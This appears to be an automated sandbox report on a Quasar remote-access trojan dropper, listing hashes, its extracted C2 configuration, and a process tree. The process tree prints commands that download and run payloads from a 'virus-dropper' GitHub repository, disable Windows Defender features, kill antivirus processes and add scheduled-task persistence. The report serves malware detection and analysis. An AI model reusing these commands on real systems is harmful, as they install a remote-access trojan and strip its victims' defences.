quasar | 35f13d8f063f086e5ef1cff022a0f1bb3daf65ed7163ec7854cc9b3c8bf46c1d

Analysis

max time kernel
149s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
23-05-2022 17:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TBAG2.exe
Size

163KB
MD5

7f2a753436c357cf86cefee430626e09
SHA1

67f6f4cc1f66b7300e9692046a049efeede32dc1
SHA256

35f13d8f063f086e5ef1cff022a0f1bb3daf65ed7163ec7854cc9b3c8bf46c1d
SHA512

0e58b52adca2961b69f5e53b3f5d705b20131723f5c1244d0103a66a40616757693cf992384c0f61ba5e9f2c205ebc97a93791167cf6ba95d7280c10208403e4

Score

10^/10

quasar someone discovery persistence pyinstaller spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

Someone

192.168.2.114:4782

Mutex

33bbb393-2876-451f-99b3-219386c5c0e9

Attributes

encryption_key
2E5172990D74D1F134C8172466E0375E463B76FD
install_name
winmanager.exe
log_directory
properties
reconnect_delay
3000
startup_key
WinManager
subdirectory
Windows Manager

Signatures

Quasar Payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Windows3.exe	family_quasar
C:\Windows\System32\Windowsexe\Windows3.exe	family_quasar
behavioral2/memory/1424-225-0x0000000000770000-0x0000000000A3A000-memory.dmp	family_quasar

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Downloads MZ/PE file
Executes dropped EXE 7 IoCs

Processes:

NSudo.exeNSudo.exeWindows.exeWindows2.exeWindows3.exeWindows.exeWindows2.exe

pid process

3612 NSudo.exe
3224 NSudo.exe
2824 Windows.exe
4452 Windows2.exe
1424 Windows3.exe
1544 Windows.exe
3804 Windows2.exe

pid	process
3612	NSudo.exe
3224	NSudo.exe
2824	Windows.exe
4452	Windows2.exe
1424	Windows3.exe
1544	Windows.exe
3804	Windows2.exe

Loads dropped DLL 64 IoCs

Processes:

Windows.exeWindows2.exe

pid	process
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
3804	Windows2.exe
3804	Windows2.exe
3804	Windows2.exe
3804	Windows2.exe
3804	Windows2.exe
3804	Windows2.exe
3804	Windows2.exe
3804	Windows2.exe
3804	Windows2.exe
3804	Windows2.exe
3804	Windows2.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
1544	Windows.exe
3804	Windows2.exe
1544	Windows.exe
3804	Windows2.exe
3804	Windows2.exe
3804	Windows2.exe
1544	Windows.exe
1544	Windows.exe
3804	Windows2.exe
3804	Windows2.exe
3804	Windows2.exe
3804	Windows2.exe
3804	Windows2.exe
3804	Windows2.exe
3804	Windows2.exe

Modifies file permissions 1 TTPs 18 IoCs

discovery

File Permissions Modification

T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid	process
2264	icacls.exe
2444	icacls.exe
628	icacls.exe
1828	icacls.exe
828	icacls.exe
3548	icacls.exe
3584	icacls.exe
1768	icacls.exe
4444	icacls.exe
4104	icacls.exe
1068	icacls.exe
4932	icacls.exe
1092	icacls.exe
4900	icacls.exe
3624	icacls.exe
3120	icacls.exe
1612	icacls.exe
3948	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

TBAG2.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce	TBAG2.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	TBAG2.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 4 IoCs

Processes:

cmd.exeWindows3.exe

description	ioc	process
File created	C:\Windows\System32\Windowsexe\Windows2.exe	cmd.exe
File opened for modification	C:\Windows\System32\Windowsexe\Windows2.exe	cmd.exe
File created	C:\Windows\system32\Windows Manager\winmanager.exe	Windows3.exe
File opened for modification	C:\Windows\system32\Windows Manager\winmanager.exe	Windows3.exe

Detects Pyinstaller 5 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\Windows.exe	pyinstaller
C:\Windows\System32\Windowsexe\Windows.exe	pyinstaller
C:\Windows\System32\Windowsexe\Windows2.exe	pyinstaller
C:\Windows\System32\Windowsexe\Windows2.exe	pyinstaller
C:\Windows\System32\Windowsexe\Windows.exe	pyinstaller

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2856 schtasks.exe
2452 schtasks.exe
880 schtasks.exe
2644 schtasks.exe
4020 schtasks.exe

pid	process
2856	schtasks.exe
2452	schtasks.exe
880	schtasks.exe
2644	schtasks.exe
4020	schtasks.exe

Delays execution with timeout.exe 12 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
3484	timeout.exe
4152	timeout.exe
4032	timeout.exe
4640	timeout.exe
3960	timeout.exe
3092	timeout.exe
2796	timeout.exe
1432	timeout.exe
3824	timeout.exe
2832	timeout.exe
4036	timeout.exe
1488	timeout.exe

Kills process with taskkill 48 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1092	taskkill.exe
1112	taskkill.exe
1860	taskkill.exe
3844	taskkill.exe
3188	taskkill.exe
5108	taskkill.exe
1436	taskkill.exe
1612	taskkill.exe
1340	taskkill.exe
2452	taskkill.exe
208	taskkill.exe
1052	taskkill.exe
328	taskkill.exe
3052	taskkill.exe
1460	taskkill.exe
3456	taskkill.exe
3764	taskkill.exe
912	taskkill.exe
4468	taskkill.exe
4188	taskkill.exe
1880	taskkill.exe
4856	taskkill.exe
488	taskkill.exe
832	taskkill.exe
4484	taskkill.exe
4264	taskkill.exe
3612	taskkill.exe
1768	taskkill.exe
1372	taskkill.exe
4488	taskkill.exe
3276	taskkill.exe
2212	taskkill.exe
5096	taskkill.exe
4860	taskkill.exe
3540	taskkill.exe
4768	taskkill.exe
3460	taskkill.exe
2988	taskkill.exe
1296	taskkill.exe
728	taskkill.exe
216	taskkill.exe
4104	taskkill.exe
1928	taskkill.exe
3620	taskkill.exe
3996	taskkill.exe
4904	taskkill.exe
3548	taskkill.exe
3604	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 26 IoCs

Processes:

powershell.exepowershell.exepowershell.exeNSudo.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeNSudo.exepowershell.exepowershell.exe

pid	process
1528	powershell.exe
1528	powershell.exe
1936	powershell.exe
1936	powershell.exe
224	powershell.exe
224	powershell.exe
3612	NSudo.exe
3612	NSudo.exe
3064	powershell.exe
3064	powershell.exe
3668	powershell.exe
3668	powershell.exe
1692	powershell.exe
1692	powershell.exe
1680	powershell.exe
1680	powershell.exe
3924	powershell.exe
3924	powershell.exe
1016	powershell.exe
1016	powershell.exe
3224	NSudo.exe
3224	NSudo.exe
1136	powershell.exe
1136	powershell.exe
2396	powershell.exe
2396	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exepowershell.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	4168	WMIC.exe
Token: SeSecurityPrivilege	4168	WMIC.exe
Token: SeTakeOwnershipPrivilege	4168	WMIC.exe
Token: SeLoadDriverPrivilege	4168	WMIC.exe
Token: SeSystemProfilePrivilege	4168	WMIC.exe
Token: SeSystemtimePrivilege	4168	WMIC.exe
Token: SeProfSingleProcessPrivilege	4168	WMIC.exe
Token: SeIncBasePriorityPrivilege	4168	WMIC.exe
Token: SeCreatePagefilePrivilege	4168	WMIC.exe
Token: SeBackupPrivilege	4168	WMIC.exe
Token: SeRestorePrivilege	4168	WMIC.exe
Token: SeShutdownPrivilege	4168	WMIC.exe
Token: SeDebugPrivilege	4168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4168	WMIC.exe
Token: SeRemoteShutdownPrivilege	4168	WMIC.exe
Token: SeUndockPrivilege	4168	WMIC.exe
Token: SeManageVolumePrivilege	4168	WMIC.exe
Token: 33	4168	WMIC.exe
Token: 34	4168	WMIC.exe
Token: 35	4168	WMIC.exe
Token: 36	4168	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4168	WMIC.exe
Token: SeSecurityPrivilege	4168	WMIC.exe
Token: SeTakeOwnershipPrivilege	4168	WMIC.exe
Token: SeLoadDriverPrivilege	4168	WMIC.exe
Token: SeSystemProfilePrivilege	4168	WMIC.exe
Token: SeSystemtimePrivilege	4168	WMIC.exe
Token: SeProfSingleProcessPrivilege	4168	WMIC.exe
Token: SeIncBasePriorityPrivilege	4168	WMIC.exe
Token: SeCreatePagefilePrivilege	4168	WMIC.exe
Token: SeBackupPrivilege	4168	WMIC.exe
Token: SeRestorePrivilege	4168	WMIC.exe
Token: SeShutdownPrivilege	4168	WMIC.exe
Token: SeDebugPrivilege	4168	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4168	WMIC.exe
Token: SeRemoteShutdownPrivilege	4168	WMIC.exe
Token: SeUndockPrivilege	4168	WMIC.exe
Token: SeManageVolumePrivilege	4168	WMIC.exe
Token: 33	4168	WMIC.exe
Token: 34	4168	WMIC.exe
Token: 35	4168	WMIC.exe
Token: 36	4168	WMIC.exe
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeIncreaseQuotaPrivilege	1528	powershell.exe
Token: SeSecurityPrivilege	1528	powershell.exe
Token: SeTakeOwnershipPrivilege	1528	powershell.exe
Token: SeLoadDriverPrivilege	1528	powershell.exe
Token: SeSystemProfilePrivilege	1528	powershell.exe
Token: SeSystemtimePrivilege	1528	powershell.exe
Token: SeProfSingleProcessPrivilege	1528	powershell.exe
Token: SeIncBasePriorityPrivilege	1528	powershell.exe
Token: SeCreatePagefilePrivilege	1528	powershell.exe
Token: SeBackupPrivilege	1528	powershell.exe
Token: SeRestorePrivilege	1528	powershell.exe
Token: SeShutdownPrivilege	1528	powershell.exe
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeSystemEnvironmentPrivilege	1528	powershell.exe
Token: SeRemoteShutdownPrivilege	1528	powershell.exe
Token: SeUndockPrivilege	1528	powershell.exe
Token: SeManageVolumePrivilege	1528	powershell.exe
Token: 33	1528	powershell.exe
Token: 34	1528	powershell.exe
Token: 35	1528	powershell.exe
Token: 36	1528	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

TBAG2.execmd.execmd.execmd.exenet.exe

description	pid	process	target process
PID 2108 wrote to memory of 2964	2108	TBAG2.exe	cmd.exe
PID 2108 wrote to memory of 2964	2108	TBAG2.exe	cmd.exe
PID 2964 wrote to memory of 4168	2964	cmd.exe	WMIC.exe
PID 2964 wrote to memory of 4168	2964	cmd.exe	WMIC.exe
PID 2964 wrote to memory of 2456	2964	cmd.exe	find.exe
PID 2964 wrote to memory of 2456	2964	cmd.exe	find.exe
PID 2964 wrote to memory of 1432	2964	cmd.exe	cacls.exe
PID 2964 wrote to memory of 1432	2964	cmd.exe	cacls.exe
PID 2964 wrote to memory of 4672	2964	cmd.exe	curl.exe
PID 2964 wrote to memory of 4672	2964	cmd.exe	curl.exe
PID 2964 wrote to memory of 4536	2964	cmd.exe	cmd.exe
PID 2964 wrote to memory of 4536	2964	cmd.exe	cmd.exe
PID 2964 wrote to memory of 1820	2964	cmd.exe	cacls.exe
PID 2964 wrote to memory of 1820	2964	cmd.exe	cacls.exe
PID 4536 wrote to memory of 1528	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 1528	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 1936	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 1936	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 224	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 224	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 3848	4536	cmd.exe	curl.exe
PID 4536 wrote to memory of 3848	4536	cmd.exe	curl.exe
PID 4536 wrote to memory of 3868	4536	cmd.exe	cmd.exe
PID 4536 wrote to memory of 3868	4536	cmd.exe	cmd.exe
PID 4536 wrote to memory of 3548	4536	cmd.exe	curl.exe
PID 4536 wrote to memory of 3548	4536	cmd.exe	curl.exe
PID 3868 wrote to memory of 3396	3868	cmd.exe	net.exe
PID 3868 wrote to memory of 3396	3868	cmd.exe	net.exe
PID 3396 wrote to memory of 3076	3396	net.exe	net1.exe
PID 3396 wrote to memory of 3076	3396	net.exe	net1.exe
PID 4536 wrote to memory of 4764	4536	cmd.exe	curl.exe
PID 4536 wrote to memory of 4764	4536	cmd.exe	curl.exe
PID 3868 wrote to memory of 4768	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 4768	3868	cmd.exe	taskkill.exe
PID 4536 wrote to memory of 3612	4536	cmd.exe	NSudo.exe
PID 4536 wrote to memory of 3612	4536	cmd.exe	NSudo.exe
PID 3868 wrote to memory of 1612	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 1612	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 3460	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 3460	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 1768	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 1768	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 4856	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 4856	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 3052	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 3052	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 1112	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 1112	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 1372	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 1372	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 2988	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 2988	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 1460	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 1460	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 488	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 488	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 1296	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 1296	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 1860	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 1860	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 4488	3868	cmd.exe	taskkill.exe
PID 3868 wrote to memory of 4488	3868	cmd.exe	taskkill.exe
PID 4536 wrote to memory of 3064	4536	cmd.exe	powershell.exe
PID 4536 wrote to memory of 3064	4536	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\TBAG2.exe
"C:\Users\Admin\AppData\Local\Temp\TBAG2.exe"
1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2108

C:\Windows\SYSTEM32\cmd.exe
cmd /c TBAG.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:2964

C:\Windows\System32\Wbem\WMIC.exe
wmic OS get OSArchitecture,caption
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4168

C:\Windows\system32\find.exe
FIND "10"
3⤵
PID:2456

C:\Windows\system32\cacls.exe
"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
3⤵
PID:1432

C:\Windows\system32\curl.exe
curl "https://raw.githubusercontent.com/YumYummity/virus-dropper/main/install/Install.bat" --output "\Users\Admin\Install.bat"
3⤵
PID:4672

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K \Users\Admin\Install.bat
3⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Unregister-ScheduledTask -TaskName 'Install.bat' -Confirm:$false"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Users\Admin\'"
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:224

C:\Windows\system32\curl.exe
curl "https://raw.githubusercontent.com/YumYummity/virus-dropper/main/install/AV.bat" --output "AV.bat"
4⤵
PID:3848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K AV.bat
4⤵
- Suspicious use of WriteProcessMemory
PID:3868

C:\Windows\system32\net.exe
net stop "symantec antivirus"
5⤵
- Suspicious use of WriteProcessMemory
PID:3396

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "symantec antivirus"
6⤵
PID:3076

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM av*
5⤵
- Kills process with taskkill
PID:4768

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM fire*
5⤵
- Kills process with taskkill
PID:1612

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM anti*
5⤵
- Kills process with taskkill
PID:3460

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM *anti*
5⤵
- Kills process with taskkill
PID:1768

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM *kaspersky*
5⤵
- Kills process with taskkill
PID:4856

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM spy*
5⤵
- Kills process with taskkill
PID:3052

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM bullguard
5⤵
- Kills process with taskkill
PID:1112

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM PersFw
5⤵
- Kills process with taskkill
PID:1372

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM KAV*
5⤵
- Kills process with taskkill
PID:2988

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM ZONEALARM
5⤵
- Kills process with taskkill
PID:1460

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM SAFEWEB
5⤵
- Kills process with taskkill
PID:488

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM OUTPOST
5⤵
- Kills process with taskkill
PID:1296

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM nv*
5⤵
- Kills process with taskkill
PID:1860

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM nav*
5⤵
- Kills process with taskkill
PID:4488

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM F-*
5⤵
- Kills process with taskkill
PID:3620

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM ESAFE
5⤵
- Kills process with taskkill
PID:3456

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM cle
5⤵
- Kills process with taskkill
PID:1340

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM BLACKICE
5⤵
- Kills process with taskkill
PID:3276

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM def*
5⤵
- Kills process with taskkill
PID:3844

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM kav
5⤵
- Kills process with taskkill
PID:3764

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM kav*
5⤵
- Kills process with taskkill
PID:912

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM avg*
5⤵
- Kills process with taskkill
PID:2452

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM ash*
5⤵
- Kills process with taskkill
PID:3188

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM aswupdsv
5⤵
- Kills process with taskkill
PID:728

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM ewid*
5⤵
- Kills process with taskkill
PID:4468

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM guard*
5⤵
- Kills process with taskkill
PID:832

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM guar*
5⤵
- Kills process with taskkill
PID:3996

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM gcasDt*
5⤵
- Kills process with taskkill
PID:4484

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM msmp*
5⤵
- Kills process with taskkill
PID:2212

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM mcafe*
5⤵
- Kills process with taskkill
PID:208

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM mghtml
5⤵
- Kills process with taskkill
PID:216

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM msiexec
5⤵
- Kills process with taskkill
PID:4904

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM outpost
5⤵
- Kills process with taskkill
PID:4860

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM isafe
5⤵
- Kills process with taskkill
PID:3540

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM zap*
5⤵
- Kills process with taskkill
PID:3548

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM zauinst
5⤵
- Kills process with taskkill
PID:5108

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM upd*
5⤵
- Kills process with taskkill
PID:1436

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM zlclien*
5⤵
- Kills process with taskkill
PID:4104

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM minilog
5⤵
- Kills process with taskkill
PID:1092

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM cc*
5⤵
- Kills process with taskkill
PID:4264

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM norton*
5⤵
- Kills process with taskkill
PID:5096

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM norton au*
5⤵
- Kills process with taskkill
PID:1052

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM ccc*
5⤵
- Kills process with taskkill
PID:328

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM npfmn*
5⤵
- Kills process with taskkill
PID:3612

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM loge*
5⤵
- Kills process with taskkill
PID:3604

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM nisum*
5⤵
- Kills process with taskkill
PID:1928

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM issvc
5⤵
- Kills process with taskkill
PID:1880

C:\Windows\system32\taskkill.exe
taskkill /f /FI "MEMUSAGE gt 5" /IM tmp*
5⤵
- Kills process with taskkill
PID:4188

C:\Windows\system32\curl.exe
curl "https://raw.githubusercontent.com/YumYummity/virus-dropper/main/install/NSudo.exe" --output "NSudo.exe"
4⤵
PID:3548

C:\Windows\system32\curl.exe
curl "https://raw.githubusercontent.com/YumYummity/virus-dropper/main/install/Windows3.exe" --output "C:\Users\Admin\AppData\Roaming\Windows3.exe"
4⤵
PID:4764

C:\Users\Admin\NSudo.exe
NSudo -U:T -ShowWindowMode:Hide reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"Windows.exe'"
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"Windows2.exe'"
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3668

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"Windows3.exe'"
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionProcess '"winmanager.exe'"
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1680

C:\Windows\system32\curl.exe
curl "https://raw.githubusercontent.com/YumYummity/virus-dropper/main/install/Windows.exe" --output "C:\Users\Admin\AppData\Roaming\Windows.exe"
4⤵
PID:2120

C:\Windows\system32\curl.exe
curl "https://raw.githubusercontent.com/YumYummity/virus-dropper/main/Update.bat" --output "C:\Users\Admin\AppData\Roaming\update.bat"
4⤵
PID:3584

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Windows\System32\Windowsexe'"
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:3924

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath '"C:\Windows\System32\Winmanager'"
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1016

C:\Users\Admin\NSudo.exe
NSudo -U:T -ShowWindowMode:Hide reg del "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /f
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3224

C:\Windows\System32\Windowsexe\Windows.exe
"C:\Windows\System32\Windowsexe\Windows.exe"
4⤵
- Executes dropped EXE
PID:2824

C:\Windows\System32\Windowsexe\Windows.exe
"C:\Windows\System32\Windowsexe\Windows.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
6⤵
PID:4436

C:\Windows\System32\Windowsexe\Windows2.exe
"C:\Windows\System32\Windowsexe\Windows2.exe"
4⤵
- Executes dropped EXE
PID:4452

C:\Windows\System32\Windowsexe\Windows2.exe
"C:\Windows\System32\Windowsexe\Windows2.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
6⤵
PID:4860

C:\Windows\System32\Windowsexe\Windows3.exe
"C:\Windows\System32\Windowsexe\Windows3.exe"
4⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1424

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "WinManager" /sc ONLOGON /tr "C:\Windows\System32\Windowsexe\Windows3.exe" /rl HIGHEST /f
5⤵
- Creates scheduled task(s)
PID:2856

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Remove-MpPreference -ExclusionPath '"C:\Users\Admin\'"
4⤵
